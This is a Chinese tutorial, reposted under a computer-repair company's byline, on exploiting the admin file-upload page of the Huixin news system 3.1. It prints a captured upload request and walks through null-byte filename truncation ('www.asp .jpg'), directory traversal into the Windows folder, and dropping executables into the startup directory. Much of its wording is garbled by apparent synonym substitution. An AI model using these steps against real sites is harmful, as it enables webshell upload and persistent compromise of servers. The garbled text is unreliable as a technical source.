在惠信新闻系统中应用文件上传漏洞

  迩来各人为dvbbs的文件上传毛病愉快不已，想想在其他的系统内里能不能用的上呢？我就以惠信消息系统来抛砖引玉吧！
  系统环境：惠信消息系统3.1，Windows2000+sp4。
  先看这句代码：
  admin_uploadfilesave.asp
  ...............
  Server.mappath(formPath&file.FileName)
  ............................
  生存时用途径+文件名+后缀名，那我们可以用dvbbs上的毛病了，只不过我们改的是文件名（因为系统有牢固的途径，改途径的话，上传不会乐成）
  这是我捕捉的数据：
  POST /admin_uploadfilesave.asp HTTP/1.1
  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
  Referer: http://127.0.0.1/admin_uploadfile.asp
  Accept-Language: zh-cn
  Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  Host: 127.0.0.1
  Content-Length: 658
  Connection: Keep-Alive
  Cache-Control: no-cache
  Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL
  -----------------------------7d42cb1f101ae
  Content-Disposition: form-data; name="act"
  upload
  -----------------------------7d42cb1f101ae
  Content-Disposition: form-data; name="upcount"
  1
  -----------------------------7d42cb1f101ae
  Content-Disposition: form-data; name="filepath"
  newstxt/
  -----------------------------7d42cb1f101ae
  Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg"
  Content-Type: text/plain
  <% language=vbscript %>
    hkhjkjkjjlkkkkkk>
  -----------------------------7d42cb1f101ae
  Content-Disposition: form-data; name="Submit"
  提交
  -----------------------------7d42cb1f101ae--
  我将其中filename 处改为www.asp+（空格）.jpg，同dvbbs使用一样改content_length的长度，然后用编辑器修正空格十六进制20为00，上传乐成！
  再看途径我们不能改，那能不能使用../../这样的方法回切呢？试试就知道了。捕捉数据同上，将
  name="filepath"
  newstxt/ 改为： newstxt/../../../winnt
  content-length:658 改为：（658+14）672
  好，开始上传，哈哈！在Winnt下发现www.asp文件。那我们就可以将途径改为Windows的自启动目录，上传exe、vbs、bat……文件。不过以上都要在得到消息系统的管理者之后，进一步进入。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：